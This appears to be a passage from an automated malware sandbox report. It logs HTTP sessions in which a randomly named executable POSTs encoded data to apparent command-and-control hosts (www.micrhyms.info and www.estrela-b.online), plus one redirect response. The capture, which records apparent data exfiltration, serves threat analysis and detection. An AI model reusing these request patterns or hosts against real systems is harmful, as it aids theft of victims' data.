                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.224917115.197.148.3380172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:16.953824997 CET2472OUTPOST /uao9/ HTTP/1.1
                                                                                  Host: www.micrhyms.info
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.micrhyms.info
                                                                                  Referer: http://www.micrhyms.info/uao9/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 63 70 4e 70 41 38 63 32 48 67 2f 73 50 6b 45 50 53 41 58 6b 6a 47 4e 47 77 65 32 41 44 45 73 36 73 64 52 61 51 31 43 69 4a 42 72 72 4e 4d 7a 34 68 79 36 44 43 69 53 47 4e 63 59 7a 57 47 5a 58 62 52 61 4b 66 32 4d 5a 37 70 76 79 54 66 35 62 37 6f 79 41 55 33 70 51 7a 65 35 65 50 58 4e 55 34 37 33 4b 67 72 52 61 73 64 70 70 42 55 52 6e 42 68 56 30 4a 36 51 38 50 64 4b 4d 31 52 2b 64 30 49 30 56 53 67 36 43 44 43 68 79 34 64 49 45 6d 52 47 74 6b 4f 30 45 68 4e 6e 4a 31 67 4a 30 70 62 35 6b 39 68 6d 34 57 78 79 67 71 54 4c 47 31 52 4e 37 2b 64 4b 67 5a 36 4a 48 68 63 61 56 56 4e 5a 4a 6f 66 38 4b 37 69 62 30 2b 68 39 48 76 45 35 61 79 64 75 2f 38 63 66 52 4d 6f 79 73 78 68 48 48 50 48 42 48 58 4f 61 32 54 6b 34 35 74 4e 56 4c 51 6f 4d 48 49 6e 30 58 78 76 74 4e 46 41 6d 37 73 62 39 4c 42 58 70 47 6c 50 79 7a 47 6e 6b 71 52 50 4f 50 77 44 54 73 50 45 65 66 66 67 69 54 32 69 67 77 73 69 54 68 78 58 62 63 46 79 6b 34 46 59 45 58 5a 62 68 70 75 69 2f 36 31 [TRUNCATED]
                                                                                  Data Ascii: 5RH=tuk1l9qtrPIRdcpNpA8c2Hg/sPkEPSAXkjGNGwe2ADEs6sdRaQ1CiJBrrNMz4hy6DCiSGNcYzWGZXbRaKf2MZ7pvyTf5b7oyAU3pQze5ePXNU473KgrRasdppBURnBhV0J6Q8PdKM1R+d0I0VSg6CDChy4dIEmRGtkO0EhNnJ1gJ0pb5k9hm4WxygqTLG1RN7+dKgZ6JHhcaVVNZJof8K7ib0+h9HvE5aydu/8cfRMoysxhHHPHBHXOa2Tk45tNVLQoMHIn0XxvtNFAm7sb9LBXpGlPyzGnkqRPOPwDTsPEeffgiT2igwsiThxXbcFyk4FYEXZbhpui/61RnyBmPb7yrNf6rK5t1xNU4AOTUGm+dzUKpZg2Sk3E+aCJZLsCKeh6zc1NGg5rXT/wgMM1XPCQOW4G/T1/WmuvbjH+6PW6Nu97NopNkE6URZXWK6obBPOeiZzPmRAzA8oHH1rQZ4tWPPg1Vh94ftPe9XZ5GzDpamPTVF5vqBKBrr4OSila/MYhgrY04XIqwTqatbpVCVcsp17fr+C0/JndW80ykzSEHTiEoMQFNWOZ+3G5j+KttsO7rtyNpRRcbhjMqzyq30ZWdfgH7oaSb26o51wqDKn2ICO9mD/UOELMqYItfYcuVaJrPY+Zut0RZpoKh3IEp0LJi7NlKE3LYf3plwtKKHR3W4omvboTIyyYYZmh+v3X1e0b1CZu/qalszEDw1s8r4z+Z3j7CSfSyYM9PTTb0GMnvgquIKQqb8XboajW+Z6KspqFCttiNbBw0vh+ucBUEKKg0+EYFRHwmULqWKI8cXUt5EZnvkkRgNDUFlGZ3WKFkiByY0XpMFi4Z+N22Xn2dtRW5C3TyQNBGaZE6PAPfcgLE6VAgTQyqj/oJNp19be0a/xLWPddZSolJW/xH0y2Dka7t1ZaYlBG997IoZCuIUu1XsBQkvMLyldHanUHGSfPl69md21z+kRH3VzdZNYr9umPutQIgiTuSynR7Zjv11qkeioWI [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:16.959029913 CET161OUTData Raw: 61 32 6b 66 75 69 77 62 4b 31 6a 69 2b 74 68 2b 48 52 44 55 69 73 59 78 4d 6a 38 59 78 41 4d 47 30 73 77 5a 30 36 2b 58 6f 48 39 57 55 46 39 56 43 31 48 4a 53 34 78 69 65 75 4b 48 52 73 73 31 66 4e 7a 34 72 31 4a 36 53 39 76 6a 79 55 4c 42 7a 64
                                                                                  Data Ascii: a2kfuiwbK1ji+th+HRDUisYxMj8YxAMG0swZ06+XoH9WUF9VC1HJS4xieuKHRss1fNz4r1J6S9vjyULBzd68wg6AqBP3YQkEZONEEj27Itz86BoFcIpXvME9NUzBApdANlOahPpGhft59XWqnhQgtpiWs0FClYTHL


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.224917215.197.148.3380172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:19.489862919 CET672OUTPOST /uao9/ HTTP/1.1
                                                                                  Host: www.micrhyms.info
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.micrhyms.info
                                                                                  Referer: http://www.micrhyms.info/uao9/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 64 70 4e 70 53 45 63 33 6e 67 2f 67 76 6b 45 46 79 41 64 6b 6a 4c 79 47 30 6e 78 41 77 6b 73 37 39 74 52 61 6d 68 43 6a 4a 42 73 67 74 4d 33 6c 52 7a 2b 44 43 69 47 47 50 49 59 7a 57 53 5a 55 35 5a 61 49 65 32 50 57 72 70 74 30 54 66 38 62 37 6b 5a 41 54 2b 6b 51 79 6d 35 65 4d 44 4e 53 49 4c 33 42 6a 44 52 63 63 64 56 39 78 55 47 6e 42 74 36 30 49 4b 59 38 4f 52 4b 4e 41 4a 2b 65 6d 51 30 52 42 34 36 49 6a 43 38 31 34 63 4c 4d 6b 49 42 72 33 53 6e 41 54 4e 6d 4b 47 6b 6b 30 34 4c 55 73 38 49 6f 33 58 74 61 70 4e 65 2f 41 32 73 37 6b 77 3d 3d
                                                                                  Data Ascii: 5RH=tuk1l9qtrPIRddpNpSEc3ng/gvkEFyAdkjLyG0nxAwks79tRamhCjJBsgtM3lRz+DCiGGPIYzWSZU5ZaIe2PWrpt0Tf8b7kZAT+kQym5eMDNSIL3BjDRccdV9xUGnBt60IKY8ORKNAJ+emQ0RB46IjC814cLMkIBr3SnATNmKGkk04LUs8Io3XtapNe/A2s7kw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.224917315.197.148.3380172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:22.028925896 CET2472OUTPOST /uao9/ HTTP/1.1
                                                                                  Host: www.micrhyms.info
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.micrhyms.info
                                                                                  Referer: http://www.micrhyms.info/uao9/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 38 5a 4e 76 31 6f 63 78 48 67 38 75 50 6b 45 50 53 41 5a 6b 6a 48 79 47 77 65 32 41 43 49 73 36 71 42 52 61 41 31 43 68 4a 42 73 6f 4e 4d 7a 34 68 79 37 44 43 32 43 47 4e 41 6d 7a 56 2b 5a 58 65 39 61 4b 64 65 4d 65 37 70 76 77 54 66 37 62 37 6b 41 41 56 65 67 51 79 69 54 65 4d 62 4e 53 65 2f 33 48 54 44 53 54 38 64 56 39 78 55 6a 6e 42 73 68 30 49 43 41 38 4f 35 61 4d 32 6c 2b 65 45 49 30 63 43 67 31 66 7a 43 34 34 59 64 38 45 6d 74 37 74 6b 4f 34 45 67 6f 43 4a 31 73 4a 30 37 6a 35 6b 36 31 6e 33 6d 78 74 76 4b 54 4c 4a 56 52 50 37 2b 64 6f 67 5a 36 4a 48 68 67 61 55 46 4e 5a 4a 71 33 2f 4f 37 69 62 36 65 67 39 4a 50 34 31 61 79 4a 4d 2f 38 73 6c 52 66 45 79 72 79 4a 48 57 50 48 42 50 48 4f 51 32 54 6b 6c 72 74 4e 42 4c 51 67 45 48 4f 47 7a 58 78 76 74 4e 48 49 6d 33 61 50 39 66 42 58 70 62 31 50 33 38 6d 6e 6e 71 52 4b 62 50 78 33 54 73 4c 67 65 51 49 73 69 56 77 32 6e 2f 38 69 53 72 52 58 5a 59 46 7a 67 34 46 31 68 58 5a 53 30 70 75 79 2f 36 32 [TRUNCATED]
                                                                                  Data Ascii: 5RH=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACIs6qBRaA1ChJBsoNMz4hy7DC2CGNAmzV+ZXe9aKdeMe7pvwTf7b7kAAVegQyiTeMbNSe/3HTDST8dV9xUjnBsh0ICA8O5aM2l+eEI0cCg1fzC44Yd8Emt7tkO4EgoCJ1sJ07j5k61n3mxtvKTLJVRP7+dogZ6JHhgaUFNZJq3/O7ib6eg9JP41ayJM/8slRfEyryJHWPHBPHOQ2TklrtNBLQgEHOGzXxvtNHIm3aP9fBXpb1P38mnnqRKbPx3TsLgeQIsiVw2n/8iSrRXZYFzg4F1hXZS0puy/62pnzgmPbLzZH/6vO5ppxLMFAPniGj2dzAmpJzSRunE4fCJpPsCOehvgc1tGgojXS+QgL7hQeCQJBoGoZV/Cmu7qjCOqMmKNsN7NvLlnGqUIX3Xft4bpPOeuZ26RSwLA8tXH29sZ4tWMeQ0QocF6tIW5XZlWzFNaldHVF4vqZ6BriYORoFbeMY0bra1NLpOwSJStZqtCCMsv37fu6C1VJnNW81XhzTsHQDEoNxFNeuZ60G54+KtLsO33tyd5RUsbhn4q1zq345WeTAHn5qSB26h81z/oKjiINKBmEeUOErM0aItfBMu7aJy6Y7gTt1ZZoZ6hi4Eu+rIQ9NlJWHKBf35lwt2KHQfW4ZmvfZTItyYgEWho4naQe0r5CbDnqbJsyWrwl/Yo0j+fnz7yWfSKYM91TWOpG9Hvg4mILxqcwXbrRDXkXaKmpr18ttWnbw80vi2uczMEL6g0+EYCRHwiUKWoKJN5XUt5FK/vkRlgFjVN6WZSSKE/iCfx0XwZFmIZ/dW2Xn2awRW6ZHTxQN9baZEUPALfcSnE7G4gQzKqr/oJKp1+V+19/xKTPcRJSs5JXMJH5QuAsK7o+5aOsh6i97EwZAiIUZ1X+iIko8LyodHdv0HTPvDh65G320C5llL3Hw1ZLf/87GPtugIiiTybynpFZimI1tweiIWI [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:22.034459114 CET1625OUTData Raw: 61 32 57 6e 75 30 79 7a 4b 78 44 69 37 79 52 2b 4b 52 44 59 65 73 59 68 75 6a 34 63 50 48 2b 79 30 76 67 5a 30 2b 37 44 76 52 4e 57 4e 45 39 56 50 31 48 4a 32 34 78 71 53 75 4c 37 37 73 74 74 66 4e 31 55 72 30 35 36 54 36 66 6a 30 56 4c 42 66 64
                                                                                  Data Ascii: a2Wnu0yzKxDi7yR+KRDYesYhuj4cPH+y0vgZ0+7DvRNWNE9VP1HJ24xqSuL77sttfN1Ur056T6fj0VLBfd6hUg6J7BPnYQloZc9UEg27IlT87CoF/MprsME8PFHRBirk3ldivUI6eXrxBJ3u5hyQXrxeuty+lI1++Zxd7QNioFcjcDWb3+HCftviBdWJ636GikYljXJ8X1on+AygdC2Xv9GCR2iAR9128lPUDdCvTIHsC9+7R/U


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.224917415.197.148.3380172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:24.580024004 CET416OUTGET /uao9/?5RH=gsMVmNPJ8N9SSsJigSRkzHU8ucRHA0N0sVKqNnzNMDh6tN9OUV5giohWqtUcjyeiEwOtWu4dkyz3I4t4LNKsaZpWxiv3b+U2cgmSZgLKQ+77F4DmKxGHK+RD911B&WrGp=yRUDttthc40H6jfP HTTP/1.1
                                                                                  Host: www.micrhyms.info
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:46:25.192630053 CET405INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Fri, 15 Nov 2024 05:46:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 265
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 52 48 3d 67 73 4d 56 6d 4e 50 4a 38 4e 39 53 53 73 4a 69 67 53 52 6b 7a 48 55 38 75 63 52 48 41 30 4e 30 73 56 4b 71 4e 6e 7a 4e 4d 44 68 36 74 4e 39 4f 55 56 35 67 69 6f 68 57 71 74 55 63 6a 79 65 69 45 77 4f 74 57 75 34 64 6b 79 7a 33 49 34 74 34 4c 4e 4b 73 61 5a 70 57 78 69 76 33 62 2b 55 32 63 67 6d 53 5a 67 4c 4b 51 2b 37 37 46 34 44 6d 4b 78 47 48 4b 2b 52 44 39 31 31 42 26 57 72 47 70 3d 79 52 55 44 74 74 74 68 63 34 30 48 36 6a 66 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5RH=gsMVmNPJ8N9SSsJigSRkzHU8ucRHA0N0sVKqNnzNMDh6tN9OUV5giohWqtUcjyeiEwOtWu4dkyz3I4t4LNKsaZpWxiv3b+U2cgmSZgLKQ+77F4DmKxGHK+RD911B&WrGp=yRUDttthc40H6jfP"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.2249175162.241.63.7780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:30.337344885 CET2472OUTPOST /62tt/ HTTP/1.1
                                                                                  Host: www.estrela-b.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.estrela-b.online
                                                                                  Referer: http://www.estrela-b.online/62tt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 34 67 49 57 49 36 72 4e 6b 49 72 79 6f 69 57 36 5a 42 34 4b 61 42 44 44 45 46 30 34 48 2b 2b 5a 77 66 44 68 77 73 39 6e 70 78 71 4b 42 30 54 4e 53 54 63 52 4e 35 50 48 62 33 4b 38 66 4d 32 30 6a 6b 36 54 6d 64 44 68 32 36 59 4b 65 33 54 41 6b 65 70 6b 75 4b 56 67 33 54 5a 56 32 34 32 57 72 46 72 37 44 68 5a 4d 70 44 30 4f 55 57 59 31 53 79 42 52 6b 4b 63 4a 51 72 6d 6f 45 67 4c 55 6a 35 4c 6e 37 37 45 45 74 4a 6e 76 51 52 62 45 32 48 33 35 37 49 44 75 65 6e 56 6f 44 51 6f 39 5a 47 66 72 67 77 4b 56 76 6c 45 32 35 74 6b 4a 73 77 72 71 57 33 57 50 70 6f 42 51 71 67 76 64 47 64 43 41 79 46 78 41 2b 6c 4d 43 43 35 76 73 73 75 68 77 59 30 7a 76 47 37 4d 71 4d 63 66 76 4f 69 49 75 46 4c 68 64 34 55 72 4a 58 66 4f 75 44 78 58 68 30 32 35 4e 6e 56 75 47 45 4a 61 58 36 44 4d 6a 45 33 72 54 67 50 68 48 33 73 32 4b 47 34 52 55 66 32 34 49 6e 66 50 63 44 51 34 65 30 6b 62 55 6d 58 37 79 61 61 67 73 54 4b 76 33 54 72 41 38 48 78 30 30 76 72 43 79 63 49 51 69 77 36 [TRUNCATED]
                                                                                  Data Ascii: 5RH=7c5XRYbmwMaD4gIWI6rNkIryoiW6ZB4KaBDDEF04H++ZwfDhws9npxqKB0TNSTcRN5PHb3K8fM20jk6TmdDh26YKe3TAkepkuKVg3TZV242WrFr7DhZMpD0OUWY1SyBRkKcJQrmoEgLUj5Ln77EEtJnvQRbE2H357IDuenVoDQo9ZGfrgwKVvlE25tkJswrqW3WPpoBQqgvdGdCAyFxA+lMCC5vssuhwY0zvG7MqMcfvOiIuFLhd4UrJXfOuDxXh025NnVuGEJaX6DMjE3rTgPhH3s2KG4RUf24InfPcDQ4e0kbUmX7yaagsTKv3TrA8Hx00vrCycIQiw6kbpusXhhQdZDIXystLO9xVdB/GEXLOjmxhZD3ZovFYizGKAWgNklzYRmT1/6gmT8HTOxO/bCy0R0tEBUmUm9xuQV0Ox1x0qiRzTmXxlx3FtOajEC0MnGdjsNgzhQpVz5yO8CF4bPhJ2SD3D13Xf24VkxalLfyNNDOYPbjnhQXkNqZUv09qtjIi5vDYHDCNFj1efMs/SlvzDGPOffD3jOWXtP94wcuojLnadpvvGd0DMvVLstB23TCKk6NgD/fxBeqARjpTuMCXG+b6EPnzHXDv78N/ROm5cZn/yKvt7/nq0JG/gHwwGVV3ax3q3l+cLG7BYZVunewZx3i/8tO4efHnm1jWj55FfWLlKwUzALJtP/H8ajawkd9icDrYzEATnDB0gbMztI7V5SpfNwvVngHyDRISnIEWlcGjGmASdVJ1zwaLZvtBmq2SX4g4h3phW+DHQBZZMapopUTxvh+q6DS2sE2zdFhwdnuSUmLWnNKE9ryO9omw1D+zAn88QkMyuy1pkQGzGan2nL7B/Jmrzls6PaYehxUcVBUr7BGCC/w1rf4bPKdn8YPgA3iNxaOiHVvu6XGwMOlZ2JXdDYufO7lyhqLMONx+sax1uSoyE+qmIWGoE1AjPgQhhj8XXqLmFAoTcfrcMe5XLaO5VwQ0k1XX7SdObxvFnsio [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:30.342377901 CET170OUTData Raw: 43 37 49 50 30 31 51 49 6e 4e 57 4c 59 4a 64 6d 74 71 32 56 79 45 43 4e 77 6f 74 33 75 45 67 67 59 6a 50 66 2b 7a 50 79 76 41 64 43 32 65 43 42 64 52 75 67 55 4a 70 65 71 6d 73 57 77 34 75 61 6c 64 75 57 33 4f 76 68 44 51 45 51 76 46 77 38 76 41
                                                                                  Data Ascii: C7IP01QInNWLYJdmtq2VyECNwot3uEggYjPf+zPyvAdC2eCBdRugUJpeqmsWw4ualduW3OvhDQEQvFw8vAtxpBsDkmxi4h2V/LbNyuZDGV2AmPbrnYW2Oh+Nf22KXOI8j6yJ9nhDeXWw+ZlIWuVr/yf6dn0NsQIi2//hw1gGsB
                                                                                  Nov 15, 2024 06:46:31.050699949 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:30 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Newfold-Cache-Level: 2
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Content-Length: 1167
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                  Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                  Nov 15, 2024 06:46:31.050812006 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                  Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.2249176162.241.63.7780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:32.872704983 CET681OUTPOST /62tt/ HTTP/1.1
                                                                                  Host: www.estrela-b.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.estrela-b.online
                                                                                  Referer: http://www.estrela-b.online/62tt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 34 6e 63 57 49 6f 54 4e 6c 6f 72 79 76 69 57 36 57 68 34 49 61 42 47 32 45 41 56 6a 48 4e 65 5a 77 4f 7a 68 77 65 56 6e 75 78 71 4a 4b 55 54 4a 4e 44 64 54 4e 35 4f 35 62 7a 43 38 66 49 57 30 68 47 79 54 76 38 44 6d 77 36 59 4d 46 48 54 42 6b 65 31 58 75 4b 5a 77 33 54 68 56 32 37 69 57 71 46 62 37 53 30 46 4d 73 7a 30 55 53 57 59 63 53 79 4d 4d 6b 4b 73 42 51 71 61 6f 46 55 4c 55 6a 6f 72 6e 73 63 51 45 6b 70 6e 75 50 78 61 68 2f 6c 47 73 68 49 4c 79 58 47 39 5a 44 67 73 6c 56 6c 71 6e 76 69 57 67 6b 48 45 4c 35 36 68 36 68 53 75 50 55 51 3d 3d
                                                                                  Data Ascii: 5RH=7c5XRYbmwMaD4ncWIoTNloryviW6Wh4IaBG2EAVjHNeZwOzhweVnuxqJKUTJNDdTN5O5bzC8fIW0hGyTv8Dmw6YMFHTBke1XuKZw3ThV27iWqFb7S0FMsz0USWYcSyMMkKsBQqaoFULUjornscQEkpnuPxah/lGshILyXG9ZDgslVlqnviWgkHEL56h6hSuPUQ==
                                                                                  Nov 15, 2024 06:46:33.603538990 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:33 GMT
